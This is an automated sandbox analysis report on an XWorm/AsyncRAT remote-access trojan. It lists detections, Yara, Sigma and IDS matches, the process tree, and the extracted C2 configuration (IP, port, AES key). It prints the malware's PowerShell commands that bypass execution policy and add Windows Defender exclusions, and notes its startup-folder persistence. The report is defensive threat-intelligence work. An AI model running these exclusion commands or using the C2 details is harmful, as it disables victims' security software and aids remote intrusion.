Windows Analysis Report
18fvs4AVae.exe

Overview

General Information

Sample name: 18fvs4AVae.exe (renamed because original name is a hash value)
Original sample name: 9c113da0d913a9fd2a84c5c9a71da4338e3f16a62b8215ecb7a58d10ccab524f.exe
Analysis ID: 1561582
MD5: 59a9510540fec35043b990deb270b139
SHA1: 54d66862a4c08ebcba8029ec99d558725603f486
SHA256: 9c113da0d913a9fd2a84c5c9a71da4338e3f16a62b8215ecb7a58d10ccab524f
Tags: exe, user-Chainskilabs

Detection

AsyncRAT, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AsyncRAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 18fvs4AVae.exe (PID: 7396 cmdline: "C:\Users\user\Desktop\18fvs4AVae.exe" MD5: 59A9510540FEC35043B990DEB270B139)
    • powershell.exe (PID: 7524 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\18fvs4AVae.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7748 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '18fvs4AVae.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8088 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\VLC_Media.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4008 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'VLC_Media.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
AsyncRAT | AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool; however, it can also be used maliciously because it provides functionality such as a keylogger, remote desktop control, and many other functions that may cause harm to the victim's computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kits and other techniques. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
XWorm | Malware with a wide range of capabilities, ranging from RAT to ransomware. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm
{"C2 url": ["45.141.26.170"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.4"}
Source | Rule | Description | Author | Strings
18fvs4AVae.exe | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
18fvs4AVae.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
18fvs4AVae.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
18fvs4AVae.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x8188:$s6: VirtualBox
  • 0x80e6:$s8: Win32_ComputerSystem
  • 0x8b36:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8bd3:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8ce8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x87e4:$cnc4: POST / HTTP/1.1

C:\ProgramData\VLC_Media.exe | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
C:\ProgramData\VLC_Media.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\ProgramData\VLC_Media.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
C:\ProgramData\VLC_Media.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x8188:$s6: VirtualBox
  • 0x80e6:$s8: Win32_ComputerSystem
  • 0x8b36:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8bd3:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8ce8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x87e4:$cnc4: POST / HTTP/1.1

00000000.00000000.1683273081.0000000000482000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
00000000.00000000.1683273081.0000000000482000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000000.1683273081.0000000000482000.00000002.00000001.01000000.00000003.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x7f88:$s6: VirtualBox
  • 0x7ee6:$s8: Win32_ComputerSystem
  • 0x8936:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x89d3:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8ae8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x85e4:$cnc4: POST / HTTP/1.1
00000000.00000002.2946825942.0000000002771000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
Process Memory Space: 18fvs4AVae.exe PID: 7396 | JoeSecurity_XWorm | Yara detected XWorm | Joe Security

0.0.18fvs4AVae.exe.480000.0.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
0.0.18fvs4AVae.exe.480000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.0.18fvs4AVae.exe.480000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
0.0.18fvs4AVae.exe.480000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x8188:$s6: VirtualBox
  • 0x80e6:$s8: Win32_ComputerSystem
  • 0x8b36:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8bd3:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8ce8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x87e4:$cnc4: POST / HTTP/1.1

                            System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\18fvs4AVae.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\18fvs4AVae.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\18fvs4AVae.exe", ParentImage: C:\Users\user\Desktop\18fvs4AVae.exe, ParentProcessId: 7396, ParentProcessName: 18fvs4AVae.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\18fvs4AVae.exe', ProcessId: 7524, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\18fvs4AVae.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\18fvs4AVae.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\18fvs4AVae.exe", ParentImage: C:\Users\user\Desktop\18fvs4AVae.exe, ParentProcessId: 7396, ParentProcessName: 18fvs4AVae.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\18fvs4AVae.exe', ProcessId: 7524, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\18fvs4AVae.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\18fvs4AVae.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\18fvs4AVae.exe", ParentImage: C:\Users\user\Desktop\18fvs4AVae.exe, ParentProcessId: 7396, ParentProcessName: 18fvs4AVae.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\18fvs4AVae.exe', ProcessId: 7524, ProcessName: powershell.exe
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\Desktop\18fvs4AVae.exe, ProcessId: 7396, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VLC_Media.lnk
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\18fvs4AVae.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\18fvs4AVae.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\18fvs4AVae.exe", ParentImage: C:\Users\user\Desktop\18fvs4AVae.exe, ParentProcessId: 7396, ParentProcessName: 18fvs4AVae.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\18fvs4AVae.exe', ProcessId: 7524, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-23T20:56:06.689976+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.170 | 7000 | 192.168.2.4 | 49738 | TCP
2024-11-23T20:56:08.027932+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.170 | 7000 | 192.168.2.4 | 49738 | TCP
2024-11-23T20:56:19.446957+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.170 | 7000 | 192.168.2.4 | 49738 | TCP
2024-11-23T20:56:30.886735+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.170 | 7000 | 192.168.2.4 | 49738 | TCP
2024-11-23T20:56:36.678510+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.170 | 7000 | 192.168.2.4 | 49738 | TCP
2024-11-23T20:56:42.292240+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.170 | 7000 | 192.168.2.4 | 49738 | TCP
2024-11-23T20:56:53.715117+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.170 | 7000 | 192.168.2.4 | 49738 | TCP
2024-11-23T20:57:00.915702+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.170 | 7000 | 192.168.2.4 | 49738 | TCP
2024-11-23T20:57:06.709253+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.170 | 7000 | 192.168.2.4 | 49738 | TCP
2024-11-23T20:57:08.789804+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.170 | 7000 | 192.168.2.4 | 49738 | TCP
2024-11-23T20:56:08.091499+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49738 | 45.141.26.170 | 7000 | TCP
2024-11-23T20:56:19.448824+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49738 | 45.141.26.170 | 7000 | TCP
2024-11-23T20:56:30.891652+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49738 | 45.141.26.170 | 7000 | TCP
2024-11-23T20:56:42.296449+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49738 | 45.141.26.170 | 7000 | TCP
2024-11-23T20:56:53.717446+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49738 | 45.141.26.170 | 7000 | TCP
2024-11-23T20:57:00.938069+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49738 | 45.141.26.170 | 7000 | TCP
2024-11-23T20:57:08.790805+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49738 | 45.141.26.170 | 7000 | TCP
2024-11-23T20:56:06.689976+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 45.141.26.170 | 7000 | 192.168.2.4 | 49738 | TCP
2024-11-23T20:56:36.678510+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 45.141.26.170 | 7000 | 192.168.2.4 | 49738 | TCP
2024-11-23T20:57:06.709253+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 45.141.26.170 | 7000 | 192.168.2.4 | 49738 | TCP
2024-11-23T20:56:07.443101+0100 | 2855924 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49738 | 45.141.26.170 | 7000 | TCP

                            AV Detection

Source: 18fvs4AVae.exe | Avira: detected
Source: C:\ProgramData\VLC_Media.exe | Avira: detection malicious, Label: TR/Spy.Gen
Source: 18fvs4AVae.exe | Malware Configuration Extractor: Xworm {"C2 url": ["45.141.26.170"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.4"}
Source: C:\ProgramData\VLC_Media.exe | ReversingLabs: Detection: 78%
Source: 18fvs4AVae.exe | ReversingLabs: Detection: 78%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\ProgramData\VLC_Media.exe | Joe Sandbox ML: detected
Source: 18fvs4AVae.exe | Joe Sandbox ML: detected
Source: 18fvs4AVae.exe | String decryptor: 45.141.26.170
Source: 18fvs4AVae.exe | String decryptor: 7000
Source: 18fvs4AVae.exe | String decryptor: <123456789>
Source: 18fvs4AVae.exe | String decryptor: <Xwormmm>
Source: 18fvs4AVae.exe | String decryptor: XWorm V5.4
Source: 18fvs4AVae.exe | String decryptor: USB.exe
Source: 18fvs4AVae.exe | String decryptor: %ProgramData%
Source: 18fvs4AVae.exe | String decryptor: VLC_Media.exe
Source: 18fvs4AVae.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 18fvs4AVae.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                            Networking

Source: Network traffic | Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 45.141.26.170:7000 -> 192.168.2.4:49738
Source: Network traffic | Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 45.141.26.170:7000 -> 192.168.2.4:49738
Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49738 -> 45.141.26.170:7000
Source: Network traffic | Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49738 -> 45.141.26.170:7000
Source: Malware configuration extractor | URLs: 45.141.26.170
Source: Yara match | File source: 18fvs4AVae.exe, type: SAMPLE
Source: Yara match | File source: 0.0.18fvs4AVae.exe.480000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\ProgramData\VLC_Media.exe, type: DROPPED
Source: global traffic | TCP traffic: 192.168.2.4:49738 -> 45.141.26.170:7000
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1, Host: ip-api.com, Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | ASN Name: SPECTRAIPSpectraIPBVNL
Source: unknown | DNS query: name: ip-api.com
Source: unknown | TCP traffic detected without corresponding DNS query: 45.141.26.170
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: powershell.exe, 00000001.00000002.1797852987.000002D1B8130000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000001.00000002.1797852987.000002D1B8130000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 00000009.00000002.2034818425.000001AD38F0D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micr
Source: powershell.exe, 00000009.00000002.2034616879.000001AD38DE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsVa
Source: powershell.exe, 00000001.00000002.1798296730.000002D1B8170000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsg
Source: 18fvs4AVae.exe, VLC_Media.exe.0.dr | String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000001.00000002.1791703143.000002D1AFD84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1872550418.000001CE90235000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2017198373.000001AD308E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2210782431.0000016B77BC3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.2082830684.0000016B67D7A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1768182208.000002D19FF39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1823361318.000001CE803E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1934588558.000001AD20A99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2082830684.0000016B67D7A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 18fvs4AVae.exe, 00000000.00000002.2946825942.0000000002771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1768182208.000002D19FD11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1823361318.000001CE801C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1934588558.000001AD20871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2082830684.0000016B67B51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1768182208.000002D19FF39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1823361318.000001CE803E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1934588558.000001AD20A99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2082830684.0000016B67D7A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000B.00000002.2082830684.0000016B67D7A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.1798381263.000002D1B825B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000001.00000002.1768182208.000002D19FD11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1823361318.000001CE801C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1934588558.000001AD20871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2082830684.0000016B67B51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000B.00000002.2210782431.0000016B77BC3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.2210782431.0000016B77BC3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.2210782431.0000016B77BC3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000B.00000002.2082830684.0000016B67D7A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1791703143.000002D1AFD84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1872550418.000001CE90235000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2017198373.000001AD308E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2210782431.0000016B77BC3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe

                            Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match | File source: 18fvs4AVae.exe, type: SAMPLE
Source: Yara match | File source: 0.0.18fvs4AVae.exe.480000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1683273081.0000000000482000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: C:\ProgramData\VLC_Media.exe, type: DROPPED
Source: 18fvs4AVae.exe, XLogger.cs | .Net Code: KeyboardLayout
Source: VLC_Media.exe.0.dr, XLogger.cs | .Net Code: KeyboardLayout

                            Operating System Destruction

Source: C:\Users\user\Desktop\18fvs4AVae.exe | Process information set: 01 00 00 00

                            System Summary

Source: 18fvs4AVae.exe, type: SAMPLE | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 0.0.18fvs4AVae.exe.480000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 00000000.00000000.1683273081.0000000000482000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: C:\ProgramData\VLC_Media.exe, type: DROPPED | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Code function: 0_2_00007FFD9B891771
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Code function: 0_2_00007FFD9B896662
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Code function: 0_2_00007FFD9B890610
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Code function: 0_2_00007FFD9B8958B6
Source: C:\Users\user\Desktop\18fvs4AVae.exe | Code function: 0_2_00007FFD9B899420
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B8820DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD9B890E9D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD9B8920FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD9B962E11
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FFD9B8B21FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FFD9B8A1FFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FFD9B8A13DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FFD9B9730E9
Source: 18fvs4AVae.exe, 00000000.00000000.1683273081.0000000000482000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameXClient.exe4 vs 18fvs4AVae.exe
Source: 18fvs4AVae.exe | Binary or memory string: OriginalFilenameXClient.exe4 vs 18fvs4AVae.exe
Source: 18fvs4AVae.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 18fvs4AVae.exe, type: SAMPLE | Matched rule: MALWARE_Win_AsyncRAT, author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.18fvs4AVae.exe.480000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT, author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.1683273081.0000000000482000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT, author = ditekSHen, description = Detects AsyncRAT
Source: C:\ProgramData\VLC_Media.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT, author = ditekSHen, description = Detects AsyncRAT
